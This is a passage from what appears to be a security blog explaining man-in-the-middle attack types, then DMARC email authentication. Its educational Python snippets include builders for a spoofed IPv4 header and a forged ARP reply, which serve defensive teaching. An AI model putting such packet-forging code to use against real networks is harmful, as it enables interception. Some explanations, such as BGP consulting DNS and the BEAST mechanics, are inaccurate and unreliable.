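        name = unicodedata.name(ch, "")
        if name:
            scripts.add(name.split()[0])
    return scripts

def looks_homoglyphic(domain):
    """Flag domains whose labels mix scripts or use a
    non-Latin script, a common trait of IDN homograph attacks."""
    for label in domain.split("."):
        s = scripts_in(label)
        if len(s) > 1 or (s and s != {"LATIN"}):
            return True
    return False
```

For example, `looks_homoglyphic("аpple.com")` with a Cyrillic “а” flags the domain, while the all-ASCII `"apple.com"` passes.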
2. SSL Hijacking
SSL hijacking attacks are man in the middle attacks in which the criminal hijacks a user’s legitimate session and pretends to be that user. The server will not know that the person making the transaction is not the intended user.
SSL hijacking attacks are also known as session hijacking or cookie jacking attacks. SSL hijacking involves stealing session ID/session key to gain unauthorized control over the victim’s session.
How Does an SSL Hijacking Attack Work?
Once the criminal gains control of the session, they can do everything the user is authorized to do on their account: transfer or withdraw money, buy stuff, even change the victim’s account details. The previous figure is a representation of an SSL hijacking attack.
So, the question is, how does a criminal get ahold of a session key for the attack? These are some mistakes that website owners and users make that makes the session vulnerable:
- Using predictable variables to generate a session ID: It becomes easier to guess a session ID when it is generated using predictable variables like login date and time, IP address, or previous session ID. Although this practice is becoming increasingly uncommon, some websites make the mistake of using such IDs. A cybercriminal can easily use a brute force attack to guess these predictable versions of the session ID.
- Securing only a part of the website rather than the full website: Some website owners prefer to use SSL certificates on the login and payment pages but choose to save money on the other pages. Cybercriminals can easily access the communication when the user clicks on an unsecured page. The threat actor can also access the cookies that will have information about the login page.
- Clicking on links in phishing emails: The bad guys are known to send phishing emails with session IDs to the users. When the user clicks on the link, they will start a session on the account with this attacker-defined session ID. These types of attacks are known as session fixation attacks.
- Buying hardware from unreliable sources: When a user sources hardware from unreliable merchants, the hardware might be loaded with malware. Usually, this malware is designed to steal user information from the hardware’s owner and send it to the cybercriminal. The bad guys can also steal the cookies from the user’s device and gain access to their sessions.
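The first mistake above, predictable session IDs, can be contrasted with a cryptographically random one in a few lines. The function names and inputs are assumptions for illustration; the "weak" generator is shown only to make the brute-force risk concrete:

```python
import hashlib
import secrets
from datetime import datetime

def weak_session_id(ip, login_time):
    """Weak: derived from predictable inputs (IP + login time).
    An attacker who knows roughly when and from where a victim
    logged in faces only a small search space."""
    seed = f"{ip}-{login_time:%Y%m%d%H%M%S}"
    return hashlib.md5(seed.encode()).hexdigest()

def strong_session_id():
    """Strong: 32 bytes from the OS CSPRNG, infeasible to guess."""
    return secrets.token_urlsafe(32)
```

Note that the weak version is fully determined by its inputs, while two calls to the strong version never repeat in practice.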
3. SSL Stripping
SSL stripping, also known as a downgrade attack, is a type of man in the middle attack where the criminal reduces the security of a website’s connection so they can access the communications between a client and the server it connects to.
What is the number one method used for website security? It’s TLS, of course. The TLS protocol is developed to secure the communication between the website and the server, and it works. But guess what, the cybercriminals still find a way around it to launch MitM attacks.
Computer security researcher Moxie Marlinspike presented this security flaw at Black Hat 2009 in Washington, D.C. He showed that many secure sessions begin with a plain HTTP request: the user types a bare domain, the site loads over HTTP first, and only then is the connection upgraded to HTTPS. In the short window before the secure connection is established, an attacker can keep serving the unsecured HTTP version of the site to the user instead of the secure one. The result?
- The user will continue their communication, thinking they are secure.
- The server will also think there is a secure connection with a legitimate user.
- Meanwhile, the MitM has access to a secure connection with the server and an open connection with the user. This means that the attacker can access everything passed between the user and server.
How Does an SSL Stripping Attack Work?
When the user makes a request for an HTTPS website, the attacker downgrades the HTTPS to an HTTP version of the same website. The HTTP version is not secure, and the attacker can read everything between the client and the server. They can also alter and manipulate the whole conversation. An SSL stripping attack looks like this:
There are four steps involved in an SSL stripping attack:
- The user requests access to “https://example.com”
- The MitM passes on the user request to the server
- The server responds with the secure site “https://example.com”
- The MitM exploits the vulnerability and sends unsecured site “http://example.com” to the user
This may leave you wondering how a cybercriminal can degrade the security protocol. They can do this in one of three ways:
- Manually setting the proxy of the browser to route all traffic
- Using ARP poisoning
- Creating a hotspot and getting victims to connect to it
To avoid SSL stripping attacks, always check that you are working on an HTTPS site and have not shifted to an HTTP page during the session. Being mindful about the URL goes a long way to prevent greater woes. Another way to defend yourself against SSL stripping is by implementing HSTS policy – a stringent policy where only HTTPS sites are allowed to load.
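As a sketch of the HSTS defense just mentioned, here is an illustrative Python helper (the function name and defaults are my own, not from the article) that builds the response header a site would send to tell browsers to load it only over HTTPS:

```python
# Illustrative sketch of the HSTS defense against SSL stripping.
# In practice this header is set by the web server or framework and
# must be delivered over HTTPS for browsers to honor it.
def hsts_headers(max_age: int = 31536000, include_subdomains: bool = True) -> dict:
    """Return the header that instructs browsers to use HTTPS only."""
    value = f"max-age={max_age}"          # how long (seconds) to enforce HTTPS
    if include_subdomains:
        value += "; includeSubDomains"    # extend the rule to subdomains
    return {"Strict-Transport-Security": value}

# A browser that has seen this header once will upgrade later requests
# to HTTPS itself, closing the window SSL stripping depends on.
headers = hsts_headers()
```

Once a browser has cached this policy, it never issues the initial plain-HTTP request again for that host, which removes the attacker's window of opportunity.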
Method 2: Interception
With this method, the cybercriminal uses the communication protocol layers to intercept the conversation between two nodes on the internet. A criminal might just observe the data transferred from a place on the network near the communicating devices, or they can redirect the whole traffic through a node controlled by them. There are five types of man in the middle attacks that use interception:
4. IP Spoofing
When a cybercriminal spoofs the IP headers of the TCP packets transferred between two devices that trust each other, they can redirect the traffic to their chosen location. This is known as IP spoofing. An IP spoofing attack is most commonly used to create a backdoor to the victim’s IT systems by gaining root access to the host. The attack capitalizes on the trust between the two devices and is typically used as part of a larger scheme to launch a cyber attack on the target.
Data is transferred on the internet by using an internet protocol (IP) that packages it into packets. The packet headers contain the identity of the sender and the receiver in the form of IP addresses. If an attacker changes the sender’s IP address on the data header, it will look like it has come from the spoofed IP address. IP is a stateless protocol, so no data from the previous sessions are retained.
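To see why forging the sender address is trivial at the protocol level, here is an illustrative Python sketch (helper names are my own) that packs a minimal IPv4 header with an arbitrary source address. Nothing in the header proves the sender owns that address, and nothing here sends any packets:

```python
# Toy illustration of IP spoofing: the source address is just a field
# the sender fills in. (Sketch only -- no packets are sent.)
import socket
import struct

def build_ipv4_header(src_ip: str, dst_ip: str, payload_len: int = 0) -> bytes:
    version_ihl = (4 << 4) | 5           # IPv4, 5 x 32-bit words = 20 bytes
    total_length = 20 + payload_len
    return struct.pack(
        "!BBHHHBBH4s4s",
        version_ihl, 0, total_length,    # version/IHL, DSCP/ECN, total length
        0, 0,                            # identification, flags/fragment offset
        64, 6, 0,                        # TTL, protocol (6 = TCP), checksum (0 here)
        socket.inet_aton(src_ip),        # forged source address
        socket.inet_aton(dst_ip),
    )

def source_ip(header: bytes) -> str:
    # A receiver trusts whatever sits in bytes 12..16 of the header.
    return socket.inet_ntoa(header[12:16])
```

Because routers forward on the destination field only, a packet built this way travels normally while claiming to come from someone else.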
How Does an IP Spoofing Attack Work?
First, the attacker finds the IP address of the trusted host in a network. Cybercriminals are well versed in predicting TCP sequence numbers to construct a TCP packet on their own. They’ll send a message to the computer by altering the packet headers to give an impression that they’re coming from that trusted host. As it is a trusted host, the target might start communicating without further inquiries.
Unfortunately, this attack is possible because the routers totally ignore the sender’s IP address, concentrating on the destination IP address. The attacker might even change the routing table to redirect the traffic on the victim network to a node they control. The computers on the victim network might not even be aware of the forged route and continue to communicate.
The attacker can be a silent observer but can also send emails or documents from the official email address of anybody from the target company.
IP spoofing happens while the three-way TCP handshake is carried out between the client and the server. The following steps are followed in a normal TCP handshake:
- Client sends sequence number, SYNx, to server
- Server responds with Acknowledgement ACK(x+1) + SYNy
- Client responds with ACK (y+1)
The attacker replies to the server with an estimation of “y” before the client can reply. If their estimation is correct, the server will think that they are the real client. IP spoofing is only possible if the attacker responds with a correct answer before the client, so this is a challenging attack to pull off.
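The race described above can be sketched as a toy simulation (illustrative only, with made-up helper names): the server accepts whichever party first returns y + 1, so a blind attacker only succeeds by guessing y correctly before the real client answers:

```python
# Minimal simulation of the blind-spoofing race on the TCP handshake.
import random

def server_syn_ack(x: int) -> tuple:
    """Server answers SYN(x) with ACK(x+1) and its own secret number y."""
    y = random.randrange(2**32)
    return x + 1, y

def server_accepts(y: int, final_ack: int) -> bool:
    # The server only checks that the final ACK equals y + 1 --
    # it has no other way to tell the real client from a spoofer.
    return final_ack == y + 1

ack, y = server_syn_ack(1000)
assert ack == 1001
assert server_accepts(y, y + 1)       # correct guess: spoof succeeds
assert not server_accepts(y, y + 2)   # wrong guess: handshake fails
```

With y drawn from a 32-bit space, a truly random sequence number makes a blind guess succeed roughly one time in four billion, which is why modern stacks randomize it.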
5. ARP Spoofing
Next on our list of the types of man in the middle attacks is ARP spoofing. An ARP spoofing attack allows bad guys to intercept specific types of communications between network devices. More specifically, ARP spoofing allows an attacker to send a phony address resolution protocol (ARP) message via a local area network (LAN) to deceive the server into trusting it, ultimately misdirecting all the traffic to their device.
How Does an ARP Spoofing Attack Work?
Picture four devices connected to a LAN behind a single gateway. All the traffic that goes out to the server has to pass through that gateway. A criminal will disguise their device as one of the devices on the network to penetrate it.
Under ideal circumstances, the following steps take place:
- A network device sends a broadcast ARP request to locate a MAC address that corresponds to an IPv4 address.
- A legitimate device with an IP address that matches the request sends a reply.
- The device sending the request will cache the ARP reply in the ARP table.
The story gets interesting when a man in the middle gets in. The attacker sends back the reply when any network device shouts out to locate a MAC address. If the attacker manages to map their MAC address to an authentic IP address, they are in a position to receive every communication meant for the legitimate device.
Sometimes the attacker goes a step further and sends an ARP message with the IP address of the default gateway to capture all traffic on the LAN. All devices on the network will map the attacker’s IP address as the default gateway. This is called ARP poisoning, as the ARP tables of the devices are ‘poisoned’ with the attacker’s IP address.
Some people use the terms ‘ARP spoofing’ and ‘ARP poisoning’ interchangeably. However, there is a difference between the two. In ARP spoofing, the attacker will send their MAC address in response to a request from a device on the LAN. So, they spoof the ARP for impersonating the victim. On the other hand, in ARP poisoning, the attacker will go ahead and modify the ARP tables of one or more devices on the LAN.
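The forged ARP reply at the core of both techniques can be sketched as follows (illustrative Python; nothing is sent on the wire, and the addresses are placeholders, but the field layout follows the standard 28-byte ARP packet):

```python
# Sketch of the forged ARP reply used in ARP spoofing: the attacker
# answers "who has <victim IP>?" with their *own* MAC address.
import socket
import struct

def forged_arp_reply(attacker_mac: bytes, claimed_ip: str,
                     target_mac: bytes, target_ip: str) -> bytes:
    return struct.pack(
        "!HHBBH6s4s6s4s",
        1,                               # hardware type: Ethernet
        0x0800,                          # protocol type: IPv4
        6, 4,                            # MAC length, IPv4 address length
        2,                               # opcode 2 = ARP reply
        attacker_mac,                    # "sender" MAC: the attacker's card
        socket.inet_aton(claimed_ip),    # impersonated IP address
        target_mac,
        socket.inet_aton(target_ip),
    )

pkt = forged_arp_reply(b"\xde\xad\xbe\xef\x00\x01", "192.168.1.10",
                       b"\xaa\xbb\xcc\xdd\xee\xff", "192.168.1.20")
# The target now caches 192.168.1.10 -> attacker's MAC in its ARP table.
assert len(pkt) == 28 and pkt[6:8] == b"\x00\x02"
```

Because ARP has no authentication, the target caches whatever mapping arrives, which is exactly the weakness defenses like dynamic ARP inspection try to close.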
6. Automatic Proxy Discovery Attack
A web proxy is established in enterprises where security is a primary concern. All the web traffic passes through the proxy server after a thorough inspection of all the application layers for possible threats. WPAD (web proxy auto-discovery) is a protocol designed to assist clients in discovering the proxy automatically.
Although automatic proxy discovery saves time for the programmer as they don’t have to configure every device, WPAD is susceptible to MitM attacks. If the system administrator doesn’t want to configure the proxy server locally, they have two options for publishing the location of the proxy file:
- DHCP (dynamic host configuration protocol): The web browser first looks for the proxy configuration on the DHCP server before it turns to DNS. DHCP is built on UDP and IP. A cybercriminal might set up a malicious DHCP server and send a single spoofed UDP packet with details about the proxy configuration to the browser to launch a DHCP attack. The installation of proper firewalls can protect you from this kind of attack.
- DNS (domain name system): Like DHCP, DNS also uses UDP; therefore, cybercriminals can intercept the communication by altering the proxy configuration packet. Additionally, when an organization uses the highest level of the domain to enable WPAD, attackers might benefit by spoofing a subdomain under the primary domain. For instance, if the browser query for x.y.z.com is sent, the DNS server will first query x.y.z.com. If there is no reply, it will query y.z.com. If there is no reply there, too, the browser will query z.com. If the organization has used z.com for enabling WPAD, the criminal might spoof another subdomain to launch an attack.
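The subdomain walk described in the DNS bullet can be sketched in a few lines (a simplified model of my own; real resolution order varies by OS and browser, and modern systems restrict how far up the tree the walk goes):

```python
# Simplified model of the WPAD DNS search walk: starting from the
# client's own FQDN, strip labels and try wpad.<suffix> at each level.
# This is what gives a subdomain squatter an opening when WPAD is
# enabled too high up the domain tree.
def wpad_candidates(client_fqdn: str) -> list:
    labels = client_fqdn.split(".")
    candidates = []
    # Try wpad at every parent domain except the bare TLD.
    for i in range(1, len(labels) - 1):
        candidates.append("wpad." + ".".join(labels[i:]))
    return candidates

assert wpad_candidates("pc1.x.y.z.com") == [
    "wpad.x.y.z.com", "wpad.y.z.com", "wpad.z.com"
]
```

An attacker who can register or answer for any name late in that list gets to hand the client a malicious proxy configuration.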
One method to protect yourself from an automatic proxy discovery attack is to turn off automatic proxy detection on your device.
7. DNS Spoofing
Next on our list of the types of man in the middle attacks: DNS spoofing. This type of attack occurs when a cybercriminal replaces a legitimate IP address in a DNS server’s records. By doing this, the attacker can misdirect site visitors to a fake website instead of the real one.
The domain name system (DNS) is a protocol for mapping the destination IP address when a request is raised by a client. When a request is raised for a specific website, the browser and the operating system (OS) look for a corresponding entry in the memory cache or the device’s internal storage. If they don’t find it there, the query is passed on to search for that IP address through different servers. When it finds the matching IP address, it connects the client to it.
How Does a DNS Spoofing Attack Work?
With a fake DNS record, the user will be unaware that they are on a fake website and will use their login credentials to access their account. The MitM watches the fake website and can retrieve the client’s credentials from it. They can then use the credentials to log into the original website as the user, enabling them to retrieve all the information of the client.
The cybercriminal can go a step further and change the DNS records of a website to list their own website as the original one. This way, every time a client opens the website, they will be directed to the fake website. This method is called DNS poisoning or cache poisoning.
The DNS system is very much like an address book you keep to note down the addresses of your family and friends. If somebody changes the address on the address book, you might not know, but your letters will be delivered to the wrong person who can read and use them for malicious purposes. In the same manner, a cybercriminal spoofs the DNS records to carry out a DNS spoofing attack.
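Keeping the address-book analogy, a toy resolver cache shows why a single poisoned entry misdirects every later lookup (illustrative Python with placeholder names and documentation IP addresses):

```python
# Toy resolver cache: lookups trust the cache blindly, so one poisoned
# entry is enough to misdirect every subsequent visitor.
cache = {"mybank.example": "203.0.113.10"}    # legitimate record

def resolve(name: str) -> str:
    return cache[name]                         # no authenticity check

assert resolve("mybank.example") == "203.0.113.10"

# Attacker overwrites the cached record (cache poisoning):
cache["mybank.example"] = "198.51.100.66"      # attacker-controlled host

# Every later client is now silently sent to the fake site.
assert resolve("mybank.example") == "198.51.100.66"
```

Defenses such as DNSSEC exist precisely because plain DNS gives the resolver no way to verify who wrote an entry.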
8. BGP Misdirection
BGP misdirection is an attack where a cybercriminal redirects the internet traffic to a malicious route by spoofing the IP prefixes.
The border gateway protocol (BGP) is the routing protocol for the internet. It is like a grid that connects all the networks to each other. Generally, the BGP protocol is responsible for finding the best route for the requests raised by the devices. The protocol accesses the DNS records of the website to direct any query from the clients to the correct IP address.
How Does a BGP Misdirection Attack Work?
So, what is BGP misdirection? Well, this type of man in the middle attack is exactly what the name implies — it’s a malicious misdirection of BGP protocol to reroute the traffic through a cybercriminal-controlled network. As traffic passes through this spoofed network, the bad guy will be able to intercept, read, or even change the data before it reaches its destination.
One of the contributing factors in making a BGP misdirection attack successful is that the server and the client are unaware that their data is intercepted. A cybercriminal can easily stay undetected and intercept a huge amount of traffic.
Let’s understand BGP misdirection with the help of an example. If you are around lower Manhattan and want to drive to Central Park you’ll follow the road signs and reach your destination. Normally, you won’t have to go through Brooklyn to reach Central Park. But what if a malicious person wants you to take a route via Brooklyn? They might tweak the road signs to misdirect the traffic so that it passes through Brooklyn. An unsuspecting person might not even realize they are being misdirected because ultimately, they will reach Central Park.
BGP is akin to a GPS system on your phone. It directs all the computing devices to their destination via the shortest possible route. However, cybercriminals use BGP misdirection to route all the desired traffic through a node under their control. This way, they can monitor and intercept the network traffic. The users and the server aren’t aware that redirection has taken place, and they continue to communicate as if no one is watching.
In a recent BGP misdirection event, Vodafone’s autonomous network based in India had a BGP routing leak that impacted many U.S. companies, including Google. Unusually, the leak was a result of a mistake, not a malicious attack. While the misdirection lasted for just 10 minutes, countless users around the world were affected, causing a huge spike in traffic. Basically, it became a self-inflicted DDoS attack for Vodafone.
9. SSL BEAST (Browser Exploit Against SSL/TLS)
‘BEAST’ stands for Browser Exploit Against SSL/TLS. In a BEAST attack, cybercriminals exploit the vulnerabilities of outdated SSL/TLS protocol versions to gain access to a site’s communications. We’re including it on our list of the different types of man in the middle attacks because knowing how it works is the first step toward preventing it.
One of the best defenses against many MitM attacks is having an SSL/TLS certificate for your website. However, a certificate alone isn’t enough: if you are still using TLS 1.0 or any version of SSL, you are vulnerable to a BEAST attack, which plays on weaknesses in these older protocols to launch a man in the middle attack.
TLS encryption uses block ciphers with symmetric encryption. The popular block ciphers are DES, 3DES, and AES. SSL/TLS uses cipher block chaining (CBC) to chain the blocks with the previous one using logical XOR operation. Thus, the value of every block is dependent on the value of the previous block. The problem arises when it is time to send the last block. The last block might not have enough data to fill it, and so it’s padded with random content.
How Does an SSL Beast Exploit Attack Work?
If the attacker wants to break the encryption, they need to know the initialization vector for the string. They can break the block cipher by trying different combinations and comparing them against the initialization vector. If the block is 16 bytes, the attacker would have to try 256^16 (roughly 3.4 × 10^38) different combinations to guess it correctly in one shot. That’s a Herculean task.
To make it easier, the attacker carries out the BEAST attack by testing one byte at a time. Each byte takes at most 256 guesses; once a byte is confirmed, the attacker repeats the same process for the next byte, so a 16-byte block falls in at most 256 × 16 guesses instead of 256^16.
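The byte-at-a-time shortcut can be illustrated with a toy oracle (deliberately simplistic and entirely my own construction, not the real BEAST mechanics): guessing a 4-byte secret blind needs up to 256^4 attempts, but an oracle that confirms one byte at a time needs at most 256 × 4:

```python
# Toy demonstration of the byte-at-a-time shortcut: an oracle that
# confirms prefixes collapses an exponential search into a linear one.
SECRET = b"\x13\x37\xbe\xef"

def oracle(prefix: bytes) -> bool:
    """True when `prefix` matches the start of the secret."""
    return SECRET.startswith(prefix)

recovered, guesses = b"", 0
for _ in range(len(SECRET)):
    for b in range(256):
        guesses += 1
        if oracle(recovered + bytes([b])):
            recovered += bytes([b])     # byte confirmed; move to the next
            break

assert recovered == SECRET
assert guesses <= 256 * len(SECRET)     # vs. 256**4 = 4,294,967,296 blind
```

The real attack builds such an oracle out of the predictable IVs in TLS 1.0's cipher block chaining; the arithmetic above is why that oracle is so devastating.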
Due to the complexity of the process, BEAST attacks are not that common. However, if you are using any protocol below TLS 1.1 (which you shouldn’t be, since those versions are deprecated), you should be warned that you are vulnerable to this type of attack. The obvious security measure is to keep your security protocols up to date to keep your communication secure.
Final Words on the Different Types of MitM Attacks
We hope this article has answered your two-part question, “what are the different types of man in the middle attacks and how do they work?” As all of these types of MitM attacks are carried out using different techniques, they require different methods of prevention. We will learn about the detailed man in the middle attack prevention methods in our next article in this series.
Circling back to the movie spy character we mentioned at the beginning of the article… while these characters are the ones we cheer on in movies, real life often doesn’t match that idealistic model. In real life, we know this person is not always on the good guys’ side. And if we encounter them in real life, they certainly won’t give us a reason to cheer, because now we know how dangerous these different types of man in the middle attacks can be.
What is DMARC – All You Need to Know About the Most Effective Email Authentication Protocol
With people increasingly using emails for communication, malicious actors have more excellent opportunities to commit cybercrimes. Businesses should use email authentication protocols like SPF, DKIM, and DMARC as critical components of their cybersecurity strategy.
The internet has made it convenient for everyone to communicate using emails, and emails are the primary communication mode for most businesses. Rarely does an hour pass by without people working in organizations checking their official email accounts.
Unfortunately, while emails have increased the convenience levels, they have also provided more opportunities for malicious actors to transmit malware and try out other network infiltration activities to steal data and cause financial and reputational losses. While there are various ways to prevent falling prey to phishing attacks, using email authentication protocols like DMARC, SPF, and DKIM can help nip the problem in the bud. This article discusses DMARC in detail.
Some Eye-Opening Statistics on Email-related Threats
Here are some alarming statistics showing how grave the situation of email-borne cyberattacks like phishing and spoofing is on a company and individuals.
- The 2021 Data Breach Investigations Report by Verizon states that 96% of phishing attacks occur through emails.
- A CISCO report says that at least one person clicked a phishing link in 86% of organizations. Besides, phishing accounts for nearly 90% of data breaches.
- Symantec Research notes that 1 in every 4200 emails in 2020 was a phishing email.
What is DMARC?
So, what is DMARC, and what does DMARC stand for? DMARC is the abbreviation for ‘Domain-based Message Authentication, Reporting and Conformance.’ DMARC is an email authentication and security protocol that protects a business organization’s email domain from being misused by malicious actors for phishing scams, email spoofing, getting access to sensitive information, and other cybercrimes. DMARC works in conjunction with the existing email authentication techniques Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM), and makes them more effective by adding a critical function: reporting.
DMARC is useful to protect your email domains against cyber threats like phishing or spoofing. Publishing a DMARC record into the DNS provides the domain owner insight into who sends email on their domain’s behalf. As it allows for detailed information about the email channel, the domain holder has complete control over the domain. Thus, you can ensure that your customers and email recipients receive emails sent on your behalf without fail. Besides, it confirms the authenticity of the email source sent from the domain. It also prevents others from sending any email using your name.
DMARC – A Brief History
Having understood the DMARC definition, here is brief background information on how DMARC originated and gradually developed into an internationally accepted email authentication standard.
The DMARC standard was initially introduced in 2012 to prevent email abuse. PayPal joined Google, Microsoft, and Yahoo to create DMARC using existing email authentication protocols like SPF and DKIM. DMARC was initially conceived as an email security protocol and adopted by security experts in the financial industry.
Since its introduction, other industrial sectors have also gradually adopted DMARC as an email authentication standard. In addition, email marketers consider DMARC a critical aspect of online security because it improves deliverability. Today, almost all the major ISPs support DMARC for its value, and it is awaiting approval as an open standard protocol from the IETF (Internet Engineering Task Force).
Why is DMARC Required?
Statista reports the existence of more than four billion email users globally. This number is increasing and could reach 4.6 billion by 2025. While email provides convenience, it has also made it easier for threat actors to perpetrate their malicious deeds. DMARC is necessary to prevent these malicious actors from using the email channel to introduce malware and carry out phishing scams.
Besides providing a complete insight into email channels, DMARC makes it easy for users to identify spoofing attempts and phishing attacks. This email authentication protocol can reduce phishing attacks, prevent malware and spoofing, and protect against BEC, brand abuse, and other email-based cyberattacks.
Here are some more statistics to support DMARC deployment.
- FBI Internet Crime 2020 report states that Business Email Compromise (BEC) attacks caused losses worth $1.8 billion in 2020. The report also highlights email as the primary channel for spreading ransomware. In addition, phishing incidents have increased by 110%.
- CISCO 2021 report indicates that 80% of the global email traffic is spam.
- Verizon 2020 Report points out social engineering attacks as the prime cause of 22% of data breaches.
- The Europol 2019 Report identifies that phishing is involved in 78% of cyberespionage incidents.
- The Sonic Wall Report 2021 highlights that Microsoft Office files comprised 67% of malicious files used in email phishing scams in 2020.
How Can DMARC Help?
Adversaries send phishing emails by impersonating genuine domains. The target acts on the email message, assuming it originated from an authentic source. In the process, the network systems of business organizations get compromised. DMARC can help because it enables domains to gain insight into their email channels. Thus, business organizations find it helpful to deploy and enforce a robust authentication policy.
When domain owners enforce the DMARC policy ‘p=reject,’ organizations get protection against the following cybercrimes.
- Phishing attempts on the organization’s customers
- Ransomware and other malware attacks
- BEC, spear phishing, and CEO frauds
Usually, organizations try to gain insights into their email channels only after a threat actor has made a phishing attempt. DMARC protection, however, gives these business entities and domain owners complete insight into their email channels much earlier. Thus, it enables organizations to alert their customers well in advance about the possibilities of spoofing, phishing, or other cyberattacks.
How Does DMARC Work?
One of the classic examples of a phishing scam is in the banking sector. Malicious actors spoof banking website domains and send emails on the bank’s behalf to customers stating that their card/account has been deactivated. It asks the customer to revalidate specific personal details to activate the account. Customers get fooled into thinking it is a genuine email and act on it accordingly in full faith. As they click on the website link provided in the email, they reach a fraudulent website resembling their bank’s landing page. Subsequently, the customers log in to their internet banking accounts using their credentials and allow the threat actors to steal their personal information.
To protect internet domains from such scams, domain owners previously relied on email authentication techniques like SPF and DKIM. However, perpetrators have become sophisticated enough to bypass these measures when they are used on their own. In such circumstances, DMARC can protect customers by creating a link between SPF and DKIM. Publishing DMARC in your DNS record lets you gain insight into your email channel. For example, DMARC generates RUA (aggregate) and RUF (forensic) reports daily. These reports are sent to the email address published in your DMARC record.
RUA DMARC reports have the following characteristics.
- They are sent daily and provide a complete overview of all email traffic.
- This report offers a comprehensive list of all IP addresses that have attempted to transmit email messages to a receiver using your domain credentials.
RUF DMARC reports are different from RUA reports in the following manner.
- These reports are sent on a real-time basis and for failures alone.
- They mention the original message headers and may include the original message.
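Real aggregate (RUA) reports arrive as compressed XML attachments. The sketch below parses a heavily trimmed synthetic example with Python's standard library (the element names follow the aggregate-report schema, but the data and structure here are invented for illustration and omit most of a real report):

```python
# Sketch: reading a (heavily trimmed, synthetic) DMARC aggregate report.
# Real RUA reports are gzip/zip-compressed XML with many more fields.
import xml.etree.ElementTree as ET

SAMPLE_RUA = """
<feedback>
  <record>
    <row>
      <source_ip>203.0.113.45</source_ip>
      <count>17</count>
      <policy_evaluated><disposition>none</disposition></policy_evaluated>
    </row>
  </record>
</feedback>
"""

root = ET.fromstring(SAMPLE_RUA)
for row in root.iter("row"):
    ip = row.findtext("source_ip")                          # sending IP
    count = int(row.findtext("count"))                      # messages seen
    disposition = row.findtext("policy_evaluated/disposition")
    assert (ip, count, disposition) == ("203.0.113.45", 17, "none")
```

Walking these rows day by day is how a domain owner learns which IPs are sending mail in their name before tightening the policy.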
DMARC service providers offer a user-friendly dashboard for monitoring and analyzing your SPF, DKIM, and DMARC reports. DMARC offers three policies that let you decide what happens to your emails.
- The ‘None‘ Policy collects data and monitors your current email channel.
- The ‘Quarantine‘ Policy delivers malicious emails into the receiver’s spam or junk email folder.
- The ‘Reject‘ Policy ensures that the email is not delivered to the receiver.
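Publishing one of these policies comes down to a DNS TXT record at `_dmarc.<your-domain>`. The helper below is an illustrative sketch of my own (the addresses and domain are placeholders; the tag names v, p, rua, ruf, and pct are standard DMARC tags):

```python
# Sketch: assembling the DNS TXT record that publishes a DMARC policy.
def dmarc_record(policy: str, rua: str, ruf: str = "", pct: int = 100) -> str:
    assert policy in ("none", "quarantine", "reject")
    parts = ["v=DMARC1", f"p={policy}", f"rua=mailto:{rua}"]
    if ruf:
        parts.append(f"ruf=mailto:{ruf}")   # forensic reports, if wanted
    if pct != 100:
        parts.append(f"pct={pct}")          # apply policy to a % of mail
    return "; ".join(parts)

# Published at _dmarc.example.com as a TXT record:
record = dmarc_record("quarantine", "dmarc@example.com", pct=50)
assert record == "v=DMARC1; p=quarantine; rua=mailto:dmarc@example.com; pct=50"
```

The pct tag is what makes a gradual rollout possible: you can quarantine half of the failing mail while you tune SPF and DKIM, then raise it toward 100.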
In this way, DMARC secures your domain and gives you the discretion to decide the course of action to take when the ISP servers receive malicious emails. DMARC is a powerful tool to help secure your email domain if used correctly. It needs proper configuration because a misapplied ‘Quarantine’ or ‘Reject’ policy can lead to many false positives. Therefore, it is better to check with your DMARC service provider about the correct setup to secure your email channel.
The Spoofing Example
The above sections showed how DMARC works to secure your emails. It instructs email receivers what action to take on incoming emails, especially those that fail DMARC checks. At the outset, email receivers verify whether incoming messages pass SPF and DKIM checks and whether those results properly align with the sending domain. This determines whether a message is DMARC-compliant or DMARC-failed. Once the authentication status is verified, the defined DMARC policy takes over and the email is handled accordingly.
Three DMARC policies have been discussed above already. The simple example presented below shows what they signify and how they help DMARC mitigate the impact of spoofing.
- Monitoring Policy: p=none
The ‘p=none’ monitoring policy gives insight into the email channel by instructing the email receivers to send the respective DMARC reports to the address published in the DMARC Record. However, it does not recommend the email receivers treat these messages differently even if they fail DMARC checks. Therefore, this policy does not affect the deliverability of the email. In other words, the policy results in delivering all messages, whether genuine or not.
- Quarantine Policy: p=quarantine
The Quarantine policy is definitive because it instructs the email receivers on how to act if the email message fails or passes DMARC checks. If the message passes DMARC checks, this policy asks the receivers to deliver the emails into the primary inbox of the receiver. On the other hand, if the message fails DMARC checks, it specifies that it should get forwarded to the receiver’s spam folder. As a result, the quarantine policy mitigates the spoofing impact but delivers it to the spam folder. If required, the receiver can open the email from the spam folder or delete it. Thus, it partially affects the email’s deliverability as the message is treated as spam.
- Reject Policy: p=reject
The Reject policy is authoritative because it provides clear instructions to email receivers to reject all emails that fail DMARC checks. As a result, the receiver’s inbox receives only those emails that pass the DMARC authentication check. Emails that fail DMARC do not land in the receiver’s inbox at all: these spoofed or incorrectly set up emails are discarded outright, mitigating spoofing entirely. Unlike with the quarantine policy, you cannot find such emails even in the spam folder.
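The receiver-side logic of the three policies can be summarized in a small sketch (a simplification of my own; real evaluations also handle alignment modes, pct sampling, and the local-policy overrides discussed below):

```python
# Sketch of the receiver-side DMARC decision: a message "passes" when
# SPF or DKIM passes *and* aligns with the From: domain; otherwise the
# published policy picks the disposition.
def dmarc_disposition(spf_pass_aligned: bool, dkim_pass_aligned: bool,
                      policy: str) -> str:
    if spf_pass_aligned or dkim_pass_aligned:
        return "deliver"                       # DMARC pass
    return {"none": "deliver",                 # monitor/report only
            "quarantine": "spam-folder",       # deliver, but as spam
            "reject": "reject"}[policy]        # drop outright

assert dmarc_disposition(True, False, "reject") == "deliver"
assert dmarc_disposition(False, False, "none") == "deliver"
assert dmarc_disposition(False, False, "quarantine") == "spam-folder"
assert dmarc_disposition(False, False, "reject") == "reject"
```

Note that a single aligned pass (either SPF or DKIM) is enough for a DMARC pass, which is why forwarders that break SPF don't necessarily break DMARC.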
Overriding DMARC: An Important Point to Note
One should note that a DMARC record instructs handling emails according to the DMARC policy. However, email receivers are not obligated to follow the DMARC policy strictly. Instead, they can use their policy and decide accordingly. For instance, suppose the email receiver judges the email as legitimate. In that case, they can apply their local policy and deliver the message to the receiver’s inbox even if it fails DMARC checks. In addition, the email receiver’s local policies can be set to override the DMARC ‘p=reject’ policy.
DMARC – Common Misunderstandings
